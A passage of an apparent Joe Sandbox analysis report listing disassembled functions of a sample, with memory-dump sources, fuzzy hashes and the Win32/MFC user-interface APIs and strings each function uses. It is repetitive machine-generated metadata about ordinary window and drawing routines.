                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                                                  • String ID: string too long
                                                                  • API String ID: 2168136238-2556327735
                                                                  • Opcode ID: 38ff1ea9a85cf6fe8e2be0f8d2425dfae97b37343f93d1948712fa0825718990
                                                                  • Instruction ID: ceef71024cb0b087ae805b74ef214d937282c52f815cd416954e4b1213088715
                                                                  • Opcode Fuzzy Hash: 38ff1ea9a85cf6fe8e2be0f8d2425dfae97b37343f93d1948712fa0825718990
                                                                  • Instruction Fuzzy Hash: D431D872304A108FD728996CE890F6AF3EBEFB17547604A2EF04687641D771ECC087A4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FillParentRect
                                                                  • String ID: P13
                                                                  • API String ID: 1540079046-3933245702
                                                                  • Opcode ID: 8e4b6f812c7155152909468d20f3cac786f8399599e1618a08d137162f5c48b5
                                                                  • Instruction ID: bdce754f958c945b12d4aa391450a0b8b6321f63e8e998697f3ca22cc43f70e5
                                                                  • Opcode Fuzzy Hash: 8e4b6f812c7155152909468d20f3cac786f8399599e1618a08d137162f5c48b5
                                                                  • Instruction Fuzzy Hash: 04319E32A04209ABCF05EFA5DCC9EAA77B9EF59310F150069FA05AB251DB71DD00CB60
                                                                  APIs
                                                                  • ReleaseCapture.USER32 ref: 001FB7F4
                                                                    • Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 0027568D
                                                                    • Part of subcall function 00275637: IsRectEmpty.USER32(?), ref: 00275697
                                                                    • Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 002756EE
                                                                    • Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 002756F4
                                                                  • IsWindowVisible.USER32(?), ref: 001FB711
                                                                  • GetParent.USER32(?), ref: 001FB744
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect$CaptureParentReleaseVisibleWindow
                                                                  • String ID: 2
                                                                  • API String ID: 1768054721-3001879987
                                                                  • Opcode ID: f4eba0989c6a12cb2ebfe619dc0e633be623ff16d275bc518ae6a83f862088ee
                                                                  • Instruction ID: 918a6456919d96a759abe67a43927532cce68ce2cb8eb6c5b9ad5fd8c29e72e1
                                                                  • Opcode Fuzzy Hash: f4eba0989c6a12cb2ebfe619dc0e633be623ff16d275bc518ae6a83f862088ee
                                                                  • Instruction Fuzzy Hash: 0431C1313046009FD725AB2AD8CDFF9B7A6AF84700F19016DF28A872E1CF609C41CB81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L>0$LA/$`2
                                                                  • API String ID: 0-2202943792
                                                                  • Opcode ID: 570a90c133b93ea6b1044f9c358fb4af68107ff87424ea5e2776e52d15b88b78
                                                                  • Instruction ID: ff05d15b1d0f93e2e0fa9c3205b843a9f601bc91699db17a6b9d7b77e709d387
                                                                  • Opcode Fuzzy Hash: 570a90c133b93ea6b1044f9c358fb4af68107ff87424ea5e2776e52d15b88b78
                                                                  • Instruction Fuzzy Hash: 9631E5317387535A8B25AE318CE6FEB62E96FF2750F02003DE84AD6185DB50DDE18290
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 002179B4
                                                                    • Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2
                                                                    • Part of subcall function 001D5BF8: __EH_prolog3.LIBCMT ref: 001D5BFF
                                                                    • Part of subcall function 001D5BB6: __EH_prolog3.LIBCMT ref: 001D5BBD
                                                                    • Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905
                                                                  • _free.LIBCMT ref: 00217AAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$H_prolog3_catch_free
                                                                  • String ID: %sMDIClientArea-%d$MDITabsState
                                                                  • API String ID: 276651542-353449602
                                                                  • Opcode ID: 1bb95ed5002c13592cd6b4adea0ef0edc2ba55494d510aee57f623d90481d6db
                                                                  • Instruction ID: 5ffeabcea9ab39594a5ab5b8ff471dafbda18dc14933b0436fc05a9bcb7ebea6
                                                                  • Opcode Fuzzy Hash: 1bb95ed5002c13592cd6b4adea0ef0edc2ba55494d510aee57f623d90481d6db
                                                                  • Instruction Fuzzy Hash: 74418C31900249EFDF05EFA4C885AEDBBB5AF29304F14409DF5466B292DB709E54CB61
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002958B6
                                                                    • Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: X*1$dF/$dI/
                                                                  • API String ID: 431132790-3128823163
                                                                  • Opcode ID: 3e000b40b572259f8b04c021432cbb1de8f63fcadeb9a272caff55773ac202d3
                                                                  • Instruction ID: 8d662a46fea27eae9fc3c32a14a6d7520062bfd16bb6e71c4b96826347fb16d3
                                                                  • Opcode Fuzzy Hash: 3e000b40b572259f8b04c021432cbb1de8f63fcadeb9a272caff55773ac202d3
                                                                  • Instruction Fuzzy Hash: F34106B4805B84DEC765EFB8C491BDBFBE4AF24305F10495EA5AE97282DB706608CF11
                                                                  APIs
                                                                  • __snwprintf_s.LIBCMT ref: 001DC4DA
                                                                  • __snwprintf_s.LIBCMT ref: 001DC50C
                                                                    • Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf_s$__getptd_noexit
                                                                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                  • API String ID: 101746997-2801496823
                                                                  • Opcode ID: 0100dd05d3cb2ff6fdde985d1b26a1497eff9e3fe997966c6e90999ee4da3f6c
                                                                  • Instruction ID: 1214467ebf02bf4cd363a609bc3786889a966707b10089b8d6571eccb245fca1
                                                                  • Opcode Fuzzy Hash: 0100dd05d3cb2ff6fdde985d1b26a1497eff9e3fe997966c6e90999ee4da3f6c
                                                                  • Instruction Fuzzy Hash: E0311AB5900209AFCF11EFA5D8419DEBBB8EF68350F014427F904A7252D730AA21CFA1
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C3F8B
                                                                    • Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D8556
                                                                    • Part of subcall function 002D8541: __CxxThrowException@8.LIBCMT ref: 002D856B
                                                                    • Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D857C
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C3FA6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                  • String ID: string too long
                                                                  • API String ID: 963545896-2556327735
                                                                  • Opcode ID: 1d65e31d54ec7489955ddd6a3c65a7ee73a68f625451e93bd654bcb8cd8ffd0a
                                                                  • Instruction ID: cdee4096de8fec872999a03ba422af088ed08e4295b594cecbf6b15d0c0e4c20
                                                                  • Opcode Fuzzy Hash: 1d65e31d54ec7489955ddd6a3c65a7ee73a68f625451e93bd654bcb8cd8ffd0a
                                                                  • Instruction Fuzzy Hash: 512128327482404BD3359E5CA8A0FAAF7E9EF75720B110A1FF5928B681C7A2DC548791
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00234B2F
                                                                  • IntersectRect.USER32(00000000,?,00000000), ref: 00234B97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: IntersectObjectRect
                                                                  • String ID: NR#$TR/
                                                                  • API String ID: 3895296623-700879352
                                                                  • Opcode ID: b1088a867b2134412b324f7454adb3a75b03d080a4170be3eea6f654fa370dcc
                                                                  • Instruction ID: b112c5acb3cdb8ad4c371a842437a08e115cbe7b8063b2d3097ebf2224d4560a
                                                                  • Opcode Fuzzy Hash: b1088a867b2134412b324f7454adb3a75b03d080a4170be3eea6f654fa370dcc
                                                                  • Instruction Fuzzy Hash: DB314DB1D10219AFCF14DFA9D845AEEFBB9EF49310F14415AE505E6280DB70AA14CF60
                                                                  APIs
                                                                    • Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
                                                                    • Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • swprintf.LIBCMT ref: 0020BE5E
                                                                  • lstrlenW.KERNEL32(?), ref: 0020BE70
                                                                  • lstrlenW.KERNEL32(?), ref: 0020BE7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parentlstrlen$LongWindowswprintf
                                                                  • String ID: :%d
                                                                  • API String ID: 1122082503-1955712242
                                                                  • Opcode ID: 778c70d9fe1c5230947e7d89408b82faf56d6d848631d4d62cc77614c57a4298
                                                                  • Instruction ID: a734d6289eb74c9d5463e77c2bc47f5dd83b2bc57292af41956a3ec97c3c5377
                                                                  • Opcode Fuzzy Hash: 778c70d9fe1c5230947e7d89408b82faf56d6d848631d4d62cc77614c57a4298
                                                                  • Instruction Fuzzy Hash: 8D21A6719102049BDB21EB64CD85EEF73BCEF58304F840569F605A7292DB34EA50CB54
                                                                  APIs
                                                                    • Part of subcall function 0024C168: __EH_prolog3.LIBCMT ref: 0024C16F
                                                                    • Part of subcall function 0024C168: EnterCriticalSection.KERNEL32(00336EB4,00000000,001EC29A,00000001), ref: 0024C1CB
                                                                    • Part of subcall function 0024C168: __beginthread.LIBCMT ref: 0024C1E5
                                                                    • Part of subcall function 0024C168: SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0024C1FE
                                                                    • Part of subcall function 0024C168: LeaveCriticalSection.KERNEL32(00336EB4), ref: 0024C215
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                  • IsWindow.USER32(?), ref: 002104DB
                                                                  • InvalidateRect.USER32(?,00000054,00000001,?,00000000,00000000,00210742), ref: 002104F1
                                                                  • UpdateWindow.USER32(?), ref: 002104FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CriticalSection$EnterH_prolog3InvalidateLeavePriorityRectShowThreadUpdate__beginthread
                                                                  • String ID: <L/
                                                                  • API String ID: 701223984-623769782
                                                                  • Opcode ID: 2768bdb6196ce3ebd6dd75b0274af80021459666de704737cd0aa064388f8f69
                                                                  • Instruction ID: f7c00ead976e1b656683552ec39c3d34bb15c2f04321df8e155bbc81bfdbdcf7
                                                                  • Opcode Fuzzy Hash: 2768bdb6196ce3ebd6dd75b0274af80021459666de704737cd0aa064388f8f69
                                                                  • Instruction Fuzzy Hash: 8521B4313106009FCB25AF64C895EEEB7E6BFA8B00F14446DF14987296DBB1A891CB91
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0023B247
                                                                    • Part of subcall function 0021EA58: __EH_prolog3.LIBCMT ref: 0021EA5F
                                                                    • Part of subcall function 0021EA58: SetRectEmpty.USER32(?), ref: 0021EAF5
                                                                    • Part of subcall function 00275176: SetRectEmpty.USER32(?), ref: 002751A8
                                                                    • Part of subcall function 00275176: SetRectEmpty.USER32(?), ref: 002751AF
                                                                  • SetRectEmpty.USER32(?), ref: 0023B32D
                                                                  • SetRectEmpty.USER32(?), ref: 0023B356
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect$H_prolog3
                                                                  • String ID: `2
                                                                  • API String ID: 3752103406-2259872102
                                                                  • Opcode ID: f66fd0cac1f0333b7680ed5d24940a7978f0e34eb76a425c3fcb7dfaab970318
                                                                  • Instruction ID: cc1b1eb7e10aafaea71b5b2821d8acdfc5ff1ceec2d85474fb15dc5bcd7eabd9
                                                                  • Opcode Fuzzy Hash: f66fd0cac1f0333b7680ed5d24940a7978f0e34eb76a425c3fcb7dfaab970318
                                                                  • Instruction Fuzzy Hash: F94143B0805B84CFC3659F3A89896C6FBE0BF19300F90892ED1AE8B301DBB06554CF85
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00215927), ref: 001DF4CE
                                                                  • GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 001DF4DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: DWMAPI$DwmInvalidateIconicBitmaps
                                                                  • API String ID: 1646373207-1098356003
                                                                  • Opcode ID: 9046c24f7b87fc39d39edc371493c5ba57ec2644c18933ae55325fbc246f3757
                                                                  • Instruction ID: 3b66025d5cb54465b56c730508263472eb673941918c80442806e6c08032c296
                                                                  • Opcode Fuzzy Hash: 9046c24f7b87fc39d39edc371493c5ba57ec2644c18933ae55325fbc246f3757
                                                                  • Instruction Fuzzy Hash: 5E115172A002059BCB11DF799C88AAB77E9EF49340B15057DA90BEB241DF71DE41CB60
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001CCE54
                                                                  • GetSysColor.USER32(00000014), ref: 001CCE9E
                                                                  • CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 001CCEF1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: BitmapColorCreate_memset
                                                                  • String ID: (
                                                                  • API String ID: 3930187609-3887548279
                                                                  • Opcode ID: 4a1f42fe27ee1ddc0802426256ca951888068cb4b8db215d50b7c7950c453ddd
                                                                  • Instruction ID: df8da0eac5f7166286729dfcd613f5e588557cedd1a2bcc25017c0e98fa13b8f
                                                                  • Opcode Fuzzy Hash: 4a1f42fe27ee1ddc0802426256ca951888068cb4b8db215d50b7c7950c453ddd
                                                                  • Instruction Fuzzy Hash: 1421F531A11258DBDB04CBB8CD55BEDBBF8AB55700F00446EE54AEB281DE315A48CF61
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001CDB75
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 001CDBA1
                                                                  • GetClassInfoW.USER32(?,00000000,?), ref: 001CDBE5
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
